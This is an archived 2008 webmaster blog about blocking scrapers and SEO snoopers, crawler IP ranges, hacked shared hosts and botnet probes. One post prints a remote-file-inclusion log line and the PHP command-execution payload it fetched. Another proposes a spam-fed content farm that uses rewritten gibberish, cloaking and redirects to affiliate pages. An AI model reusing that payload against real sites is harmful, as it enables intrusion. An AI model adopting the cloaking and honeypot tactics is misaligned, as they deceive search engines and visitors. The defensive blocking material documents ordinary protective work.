I was curious why some site I submitted to about 10 years ago was pinging my server all these years later so I did a little research to see what they'd been up to in the interim and they appear to have been very prolific, almost to domain park proportions.

Jayde is currently owned by iEntry.com and if you have McAfee SiteAdvisor enabled in your browser it goes RED meaning that iEntry has something negative on file with SiteAdvisor that says the following:
Feedback from credible users suggests that this site sends either high volume or 'spammy' e-mails.
Took a look and found someone that posted one of those 'spammy emails' with a ton of iEntry's domain names listed.

On iEntry's website they claim:
iEntry properties include more than 370 Web sites and over 100 e-mail newsletters that are viewed by more than 5 million users every month.
Did a quick search for their 370 sites and Yahoo finds over 170 of them.

It appears iEntry owns ExactSeek.com, sitepronews.com, webpronews.com, metawebsearch.com, seo-news.com (and forum), and a ton of directories, bunch of sites here, shitload of sites there, and last but not least here it's tied together with ISEDN.ORG

Google and Yahoo could find listings about my sites in a bunch of their directories which begs the question:

Why do Google and Yahoo index all those redundant directories?

I found references to my sites in about 40 of them, there's a shock, knock me over with a feather. About 40 sites was all Google and Yahoo would easily report, and the answer to the "why are they indexed?" question appears to be that the order of the listings in the directory is changed for the same content on a different site, so it seems to be unique per directory as far as the search engines are concerned. Maybe there were other changes as well, I didn't look too deep.

However, I did check Live search which doesn't appear to be so gullible as it only reported the duplicate content in 5 sites.

Hey, submit your link, it's FREE and you can advertise too!

Hope I didn't blow out anyone's sarcasm meter with that last quip.

Friday, March 07, 2008

Slow Down Nosy SEO's and Snooping Competitors

Most webmasters spend a lot of time and effort working on marketing their website, or pay someone a lot of money to do this, yet don't do a few common sense things that keep lazy and nosy assed SEO's or other competitors from quickly analyzing all your hard work and simply stealing what you've done.

Not that you can completely stop them because much of the competitive information about who links to you is already public, collected by search engines and toolbars, but you can sure as hell make it a little more difficult to get the rest of the data they want.

Since the SEO Chicks published a list of competitive research tools to help those nosy SEO's snoop, I just thought it would be fair and useful to have a nice list of ways to stop as many of those snooper tools as possible.

Block Archive.org - No need to let anyone see how your site evolved, snoop or even scrape through archive pages without your knowledge so block their crawler.

User-agent: ia_archiver
Disallow: /
Rumor has it that the ia_archiver may crawl your site anyway so adding it to your .htaccess file is a good precaution as well.
RewriteCond %{HTTP_USER_AGENT} ^ia_archive
RewriteRule ^.* - [F,L]
Block Search Engine Cache - Some people cloak pages and just show the search engines raw text yet show the visitors a complete page layout. Who cares, that's your business and a competitive edge you don't need to share, plus pages can be scraped from search engine cache as well, so disable cache on all pages.

Insert the following meta tag in the <head> section of all your web pages:
<meta content='NOARCHIVE' name='ROBOTS'>
Block Xenu Link Sleuth - Why do you need people sleuthing your site? Screw 'em...

Add Xenu to your .htaccess file as well:
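# mod_rewrite has to be switched on before these rules do anything
RewriteEngine On
# return 403 Forbidden to either user agent
RewriteCond %{HTTP_USER_AGENT} ^ia_archive [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu
RewriteRule ^.* - [F,L]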
Make Your Domain Registration Private - Why give the SEOs or any other competitor any clues to help them whatsoever?

Sign up with DomainsByProxy and this will make the nosy little bastards happy:
WHATEVERMYDOMAINNAME.COM
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
Restrict Access To Unauthorized Tools - Use .htaccess to white list access to your site and allow just the major search engines and the most popular browsers, which will block many other SEO tools. If you don't understand the white list method and it scares you, there are a few good black lists around too.

This is a limited sample for informational purposes only, just to give an idea of how it works. See the thread linked above for more in-depth samples by WebSavvy, and be cautious in implementing a white list as it's very restrictive:
#allow just search engines we like, we're OPT-IN only

#a catch-all for Google
BrowserMatchNoCase Google good_pass

#a couple for Yahoo
BrowserMatchNoCase Slurp good_pass
BrowserMatchNoCase Yahoo-MMCrawler good_pass

#looks like all MSN starts with MSN or Sand
BrowserMatchNoCase ^msnbot good_pass
BrowserMatchNoCase SandCrawler good_pass

#don't forget ASK/Teoma
BrowserMatchNoCase Teoma good_pass
BrowserMatchNoCase Jeeves good_pass

#allow Firefox, MSIE, Opera etc., will punt Lynx, cell phones and PDAs, don't care
BrowserMatchNoCase ^Mozilla good_pass
BrowserMatchNoCase ^Opera good_pass

#Let just the good guys in, punt everyone else to the curb
#which includes blank user agents as well


order deny,allow
deny from all
allow from env=good_pass

Disclaimer: I don't use .htaccess for much so please don't ask for a complete file, this is just a sample as I use a more complex real-time PHP script to control access to my site.
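
If the white list logic is easier to follow as code, here's a rough Python sketch of the same idea. To be clear, this is not my real-time script and not anything Apache runs; the function name is made up for illustration, and the patterns are simply copied from the BrowserMatchNoCase lines in the sample above.

```python
import re

# Patterns copied from the BrowserMatchNoCase lines in the sample above.
ALLOWED_AGENT_PATTERNS = [
    r"Google",
    r"Slurp",
    r"Yahoo-MMCrawler",
    r"^msnbot",
    r"SandCrawler",
    r"Teoma",
    r"Jeeves",
    r"^Mozilla",
    r"^Opera",
]

# Case-insensitive, like BrowserMatchNoCase.
_ALLOWED = [re.compile(p, re.IGNORECASE) for p in ALLOWED_AGENT_PATTERNS]


def is_allowed_agent(user_agent):
    """Return True only if the user agent matches a white list pattern.

    Blank or missing user agents are punted, same as in the sample.
    (Hypothetical helper name, for illustration only.)
    """
    if not user_agent:
        return False
    return any(p.search(user_agent) for p in _ALLOWED)
```

Anything that doesn't match gets the door, which is exactly why a white list is so restrictive: a tool like libwww-perl is bounced, but so is Lynx.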

Block Bots and Speeding Crawlers - You can use something like the nifty PHP bot speed trap Alex Kemp has written or Robert Plank's AntiCrawl. It's just another layer of security piled on against snoops and scrapers that pretend to be MSIE or Firefox to avoid the white list or black list blocking in .htaccess.
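
For a feel of how a speed trap works, here's a minimal Python sketch. It is not Alex Kemp's script or AntiCrawl, just the general sliding window idea; the class name, the limits and the in-memory storage are all assumptions picked for illustration.

```python
from collections import defaultdict, deque


class SpeedTrap:
    """Sliding window request counter per IP (illustrative sketch only)."""

    def __init__(self, max_requests=10, window_seconds=5.0):
        # Both limits are arbitrary example values, tune them for your site.
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._hits = defaultdict(deque)

    def allow(self, ip, now):
        """Return True if this request is within the speed limit.

        `now` is a timestamp in seconds, e.g. from time.time().
        """
        hits = self._hits[ip]
        # Forget requests that have aged out of the window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False  # too fast, treat it as a bot
        hits.append(now)
        return True
```

A real visitor rarely trips this, while a scraper faking MSIE or Firefox that pulls pages as fast as it can will hit the limit almost immediately.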

Block Snoops From Robots.txt - Don't allow anyone other than your white listed bots to see your robots.txt file because it has other stuff in it that SEO snoops might find interesting, and it can become a security risk. Use a dynamic robots.txt file like this Perl script on WebmasterWorld and just add the rest of your allowed bots to the code next to Slurp, Googlebot, etc.
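
The dynamic robots.txt idea boils down to something like this Python sketch. It is not the WebmasterWorld Perl script; the function name, the bot list and both robots.txt bodies are hypothetical placeholders.

```python
# Hypothetical white list, extend it with the rest of your allowed bots.
ALLOWED_BOT_TOKENS = ("googlebot", "slurp")

# Placeholder contents: the real file only your allowed bots get to see...
REAL_ROBOTS = "User-agent: *\nDisallow: /private/\n"
# ...and the one everyone else gets, which tells them nothing.
DECOY_ROBOTS = "User-agent: *\nDisallow: /\n"


def robots_txt_for(user_agent):
    """Pick which robots.txt body to serve for a given user agent."""
    ua = (user_agent or "").lower()
    if any(token in ua for token in ALLOWED_BOT_TOKENS):
        return REAL_ROBOTS
    return DECOY_ROBOTS
```

Keep in mind a user agent string alone can be faked, so on its own this only stops the lazy snoops.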

Block DomainTools - Since SEOs use it to snoop, there's no reason to let DomainTools have access, so just block 'em.

Probably lots of other things you should be blocking as well but this will give you a good start.

This list doesn't completely stop snoops from manually looking at your site, but it certainly stops all of those automated tools from ripping through all your pages, search engine or archive cache, and presenting a nice pretty report.

Heck, why should you help people take away your own money?

Start slowing them down today and stop the next up and comer from getting the info too easily.

UPDATE:

One more creative thing you can do to your website is cloak the meta tags so that only the search engines see them and disable the meta tags for normal visitors. Nothing really wrong with this because meta tags by definition are only for the search engines, and snooping SEOs will be completely left in the dark when they can't see your meta keywords or description.

This works especially well if you combine cloaking meta tags with the NOARCHIVE option described above, since then they're completely hidden from prying eyes.

Monday, February 18, 2008

Hakia Search Engine Spotted?

Hakia has been advertising their search engine in beta for quite some time and the only thing I've ever seen from them hitting my server are the following sporadic log entries:

06/28/2007 204.14.209.51 "Mozilla/4.0+"
10/05/2007 204.14.209.51 "Mozilla/4.0+"
11/09/2007 204.14.209.51 "Mozilla/4.0+"
12/19/2007 204.14.209.51 "Mozilla/4.0+"
02/18/2008 204.14.209.51 "Mozilla/4.0+"
Whatever it is didn't ask for robots.txt.

Here's their IP range:
HAKIA INC. IP00095 (NET-204-14-209-0-1)
204.14.209.0 - 204.14.209.255
Maybe someone knows more about this but I can't really find any information on them crawling and didn't notice anything on their site about them having a spider.

Thursday, February 14, 2008

MSIE 7 on Livebot IPs

Not sure what this means but I spotted an MSIE 7.0 user agent on the following Livebot IP addresses.

Here's the exact agent used:

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
Here's the IPs involved:
65.55.165.119 [livebot-65-55-165-119.search.live.com.]
65.55.165.38 [livebot-65-55-165-38.search.live.com.]
65.55.165.53 [livebot-65-55-165-53.search.live.com.]
65.55.165.66 [livebot-65-55-165-66.search.live.com.]
65.55.165.96 [livebot-65-55-165-96.search.live.com.]
Could mean anything from Live testing who has rigid user agent checking to making screen shots or they're reusing those IPs for other internal purposes, hard to say.

What's not hard to say is that those IPs with that user agent got automatically blocked on my site for being the wrong thing in the wrong place.

Tuesday, February 12, 2008

Jazztel Scraping Hotzone

Found a hotzone of activity from jazztel.es, which has been attempting to scrape like crazy since the first of the year. Obviously they didn't get very far, but they keep trying and trying, so I looked at the activity and it's definitely a bot running on 87.218.70.*

Here's the number of attempted pages per IP:

785 - 87.218.70.251
661 - 87.218.70.231
630 - 87.218.70.41
346 - 87.218.70.120
336 - 87.218.70.196
334 - 87.218.70.12
334 - 87.218.70.100
333 - 87.218.70.135
329 - 87.218.70.203
328 - 87.218.70.107
283 - 87.218.70.178
199 - 87.218.70.174
So it's probably a good idea to block 87.218.70.* just to be safe.
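
If you block in code rather than at the firewall, the 87.218.70.* range is the /24 network 87.218.70.0/24. Here's a small Python sketch of that check using the standard ipaddress module; the function and list names are just for illustration.

```python
import ipaddress

# 87.218.70.* written as a /24 network.
BLOCKED_NETWORKS = [ipaddress.ip_network("87.218.70.0/24")]


def is_blocked(ip):
    """Return True if the IP falls inside any blocked network."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        # Not a parseable IP; this sketch leaves that to other checks.
        return False
    return any(addr in net for net in BLOCKED_NETWORKS)
```

Every address in the list above lands inside that one network, so a single entry covers the whole hotzone.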

Wednesday, January 30, 2008

Make Money With a Black Hat Honeypot

Instead of trying to fight forum, blog and wiki spam it finally dawned on me that I was taking the wrong approach: don't fight the Black Hat spammers, monetize them!

The basic concept is built around the black hat spammers' love of spamming, so the first thing you need to do is set up a bunch of fake forums, blogs and wikis using the popular open source software that the spammers love most. The trick is NOT to install any form of spam controls whatsoever: no captcha, no Akismet, nothing that will slow the spammer down. Let the spammers go wild with your honeypot site and let them make fake profiles, create spam threads and comments. It doesn't matter because we call all this spam "content" for this purpose.

For those advanced webmasters, take a look at some automatic content creation techniques that you can use to prime the honeypot sites with hundreds of bogus threads and blog posts of gibberish. This will trick the spammers into thinking you have a popular site where there will be lots of eyeballs looking at their spam, yet nothing could be further from the truth as nobody will ever see their spam. If you want to be truly creative, use the text jumble or synonym switch on each spammer's post to avoid duplicate content and also avoid matching their spam footprint, which could be easily detected.

Right about now you must be asking yourself:
"Why in the hell would I build a site designed to be spammed?"

The answer is simple, the spam will become your content and hopefully your honeypot sites will pick up some traffic from the search engines. Best of all, the spammers will keep hitting your site daily so you'll have fresh content and we know how the search engines just love fresh content.

Once you get this traffic from the search engine, simply redirect that traffic to the appropriate affiliate landing page based on the search keyword and VOILA! you start making sales and the free money starts rolling in with the spammers doing all the work.

So there you have a simple yet elegant solution in one neat little bundle to let spammers make you money while you screw them over wasting their time spamming your honeypot sites.

Enjoy.

Very Bad Behavior for Crashed Joomla! Sites

Which is worse, a little spam or being offline for a month?

The errors shown below are a major example of why I ask: the bot blocker can crash the whole site, and this poor webmaster has been in this state since at least Jan 24, going by Google cache's "retrieved on Jan 24, 2008". However, Live says the same site has been this way since "our crawler examined the site on 1/11/2008", so it's much worse.

Then I found another site down all month as Google cache shows "retrieved on Jan 2, 2008" so they've not only had anti-spam but anti-visitor as well, nothing to worry about.

Warning: botbehavior_bot() [function.botbehavior-bot]: SAFE MODE Restriction in effect. The script whose uid is 3647 is not allowed to access /home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php owned by uid 80 in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Warning: botbehavior_bot(/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php) [function.botbehavior-bot]: failed to open stream: Unknown error: 0 in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Fatal error: botbehavior_bot() [function.require]: Failed opening required '/home/xxx/public_html/mambots/system/bad-behavior/bad-behavior-joomla.php' (include_path='.:/usr/local/lib/php-4.4.7/lib/php') in /home/xxx/public_html/mambots/system/bb2_bot.php on line 22

Looked around the web and there are other Joomla! sites with similar issues as well which weren't completely fatal. I'm not sure why a few sites just crashed with the errors while others proceeded to display errors with page content.

All I can say is that these webmasters need a good site monitoring alarm service at a minimum.

Saturday, January 26, 2008

Yahoo Slurp Using New IPs

Yesterday my bot blocker notified me of a new range of IPs being used by Slurp that I haven't seen before.

This is a prime example of why I keep telling people who still use IP checking only to update their code and use full trip DNS checking (a reverse lookup confirmed by a forward lookup) to validate major search engines. That avoids bouncing spiders with new IPs, but people just don't listen.

Hope the following helps for anyone still validating Slurp by IP only.

The user agent:

"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
A few reverse DNS samples:
67.195.44.83 [lm302008.crawl.yahoo.net.]
67.195.44.80 [lm302005.crawl.yahoo.net.]
67.195.44.84 [lm302009.crawl.yahoo.net.]
67.195.44.103 [lm302028.crawl.yahoo.net.]
67.195.44.100 [lm302025.crawl.yahoo.net.]
67.195.44.96 [lm302021.crawl.yahoo.net.]
67.195.44.99 [lm302024.crawl.yahoo.net.]
67.195.44.92 [lm302017.crawl.yahoo.net.]
The complete list of new IPs Slurp used:
67.195.44.100
67.195.44.101
67.195.44.102
67.195.44.103
67.195.44.109
67.195.44.75
67.195.44.76
67.195.44.77
67.195.44.78
67.195.44.79
67.195.44.80
67.195.44.81
67.195.44.82
67.195.44.83
67.195.44.84
67.195.44.85
67.195.44.86
67.195.44.87
67.195.44.89
67.195.44.90
67.195.44.91
67.195.44.92
67.195.44.93
67.195.44.94
67.195.44.95
67.195.44.96
67.195.44.97
67.195.44.98
67.195.44.99
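
For anyone ready to drop IP-only checks, full trip DNS checking can be sketched in Python roughly like this. It's a minimal illustration and not my actual bot blocker: the function name and the injectable lookup parameters are made up, and the .crawl.yahoo.net suffix is simply taken from the reverse DNS samples above.

```python
import socket


def verify_crawler(ip, allowed_suffixes=(".crawl.yahoo.net",),
                   reverse_lookup=None, forward_lookup=None):
    """Full trip DNS check: IP -> host name -> back to the same IP.

    The two lookup parameters exist only so the logic can be exercised
    without touching real DNS; by default the socket module is used.
    """
    if reverse_lookup is None:
        reverse_lookup = lambda addr: socket.gethostbyaddr(addr)[0]
    if forward_lookup is None:
        forward_lookup = lambda host: socket.gethostbyname_ex(host)[2]

    try:
        host = reverse_lookup(ip).rstrip(".").lower()
    except OSError:
        return False  # no reverse DNS at all

    # The host name must belong to the search engine's crawler domain.
    if not host.endswith(tuple(allowed_suffixes)):
        return False

    # Anyone can fake a reverse record, so confirm it with a forward lookup.
    try:
        return ip in forward_lookup(host)
    except OSError:
        return False
```

With this approach a brand new Slurp IP passes without anyone having to update a list, while a scraper that only fakes the user agent fails the first step.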

Apollo Hosting Shared Server Customers Appear To Be Hacked

One of my websites is a directory and when I last ran my link checker about 10 days ago, to validate that the sites were all still valid, several of them triggered a test that I installed to check for hacked sites. After doing a little bit of research they all turned out to be hosted on Apollo Hosting.

What I found were very large blocks of ads embedded in the home page of each compromised site for every kind of pharma product you've ever seen spammed, with their links pointing to landing pages on multiple compromised servers including several universities. Some of the landing pages are also hosted on Apollo Hosting, so those servers are being used to host both the hackers' pharma links and pharma landing pages.
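
A hacked-site test for a link checker could look something like the Python sketch below. This is not the test I actually run, just one guess at a workable heuristic: count the links whose text mentions pharma terms and flag the page once there are a bunch of them. The term list, the threshold and all the names are assumptions.

```python
from html.parser import HTMLParser

# Hypothetical term list, a real check would need a much longer one.
PHARMA_TERMS = ("viagra", "cialis", "pharmacy")


class _LinkTextCollector(HTMLParser):
    """Collects the visible text of every <a> element on a page."""

    def __init__(self):
        super().__init__()
        self._in_link = False
        self.link_texts = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._in_link = True
            self.link_texts.append("")

    def handle_endtag(self, tag):
        if tag == "a":
            self._in_link = False

    def handle_data(self, data):
        if self._in_link:
            self.link_texts[-1] += data


def count_pharma_links(html):
    """Count links whose anchor text contains a pharma term."""
    parser = _LinkTextCollector()
    parser.feed(html)
    parser.close()
    return sum(
        1 for text in parser.link_texts
        if any(term in text.lower() for term in PHARMA_TERMS)
    )


def looks_hacked(html, threshold=5):
    """Flag a page once it carries a whole block of pharma links."""
    return count_pharma_links(html) >= threshold
```

A legitimate pharmacy site would obviously trip this too, so a hit is only a reason to go view the source, not proof of a hack.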

Took a quick look in Google and found a lot of references to individual sites on Apollo being hacked, but I don't think they know the extent of the problem.

Please note that these types of hackers don't seem to infect every account on the server, they just infect a chunk of them based on some unknown criteria, so it's hit and miss which domains are infected. Perhaps individual accounts were hacked, but I don't think so, as I've seen this same type of thing on iPowerWeb (which now appears cleaned up): random sites, some servers with more sites infected, others with just a few, who knows why.

Here are a few examples, view the HTML source to see all the embedded pharma ads typically at the bottom of the page:

Caution: disable javascript before you go to any domain

Server: secure1.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.251?pi=4&ob=SLD&oo=ASC
Sample 1: view-source:http://oceancyclery.com/
Sample 2: view-source:http://oldpeking.com/

Server: secure2.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.252
Sample 1: view-source:http://armandmercury.com/
Sample 2: view-source:http://altonaequipment.com/

Server: secure4.apollohosting.com
Domains: http://whois.webhosting.info/206.125.215.254
View the source on any domain in the list. Not all are infected, but it's a heavier, server-wide infestation...

So on and so forth, you get the idea.

I spot checked a handful of servers, but based on what I've run across in the past with other similar shared server infestations it's probably on all shared servers.

DISCLAIMER: The sites and servers referenced still contained the pharma ads at the time of this writing and may be cleaned up in the future. Follow the links to check the domains hosted to see if the problem still exists in the future.

Sunday, January 20, 2008

Sprint Broadband Saves Bacon Again

Last night I was working quickly trying to stop some asshole that I found attacking my site and was just about finished with the task when suddenly BLAMMO! my SSH session terminated.

My first thought was I had just done something bad and whacked the server.

In a bit of a panic I try to pull up the site in Firefox, nothing, dead.

Is my internet connection down?

Nope, I can get to other web sites and my other servers in different data centers just fine.

Must be Comcast having a routing problem, so I quickly confirm that there's a routing issue with a traceroute and breathe a sigh of relief when I can access that server via my other server.

However, this doesn't solve the problem of the asshole that was waging war on my server still abusing the damn thing. The attacker was using a huge proxy list that was more current than mine plus some other things so it wasn't as simple as just blocking a single IP address or anything like that.

So I grabbed the Sprint Broadband USB stick, plugged it in, and a minute later was back on the server via a different network connection and finished blocking the attacker.

A few hours later Comcast was functioning properly again, but thanks to Sprint Broadband I no longer feel like I'm being held hostage when Comcast's service has problems.

Having the Sprint Broadband backup is definitely not a cheap solution but it's saved my ass a few times and now I no longer need to chase Wifi hotspots when I'm on the road. If you can afford the extra $60/month for internet connection redundancy I highly recommend getting a Sprint Broadband card or an equivalent from other providers. I think I'll stick with Sprint until something better and faster comes along in my area!

Friday, January 18, 2008

Botnet Whacks ROBOTS.TXT File

Just when you think having your server hacked is bad enough, these idiots start messing with your robots.txt file.

Here's an example:

83.133.96.246 "GET //errors.php?error=http://www.thefalife.com/robots.txt??? HTTP/1.0" "libwww-perl/5.48"
What did that robots.txt contain?
<?php
echo "549821347819481
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."
";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Looks like botnets are now OK with messing up your search engine positions as well as messing up your server.

Just imagine that all the pages or images you have blocked are suddenly crawled.

Then imagine that every junk crawler you've denied is suddenly crawling all over your site.

It could take months or years to clean up the damage, if ever.

Fun, huh?
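
The request in the log line above passes a remote URL as the value of the error parameter, and that pattern is easy enough to spot before a script ever acts on it. Here's a rough Python sketch of such a check; the function name and the scheme list are assumptions, and it's a first line of defense rather than a complete filter.

```python
from urllib.parse import parse_qsl

# Schemes that have no business showing up at the start of a parameter value.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def looks_like_remote_include(request_target):
    """Return True if any query parameter value starts with a remote URL.

    `request_target` is the path plus query string from the request line.
    """
    # Everything after the first "?" is treated as the query string.
    _path, _sep, query = request_target.partition("?")
    for _name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl has already decoded %xx escapes at this point.
        if value.lower().startswith(REMOTE_SCHEMES):
            return True
    return False
```

Sites that legitimately pass URLs in parameters, such as redirect scripts, would need an exception list before using anything like this.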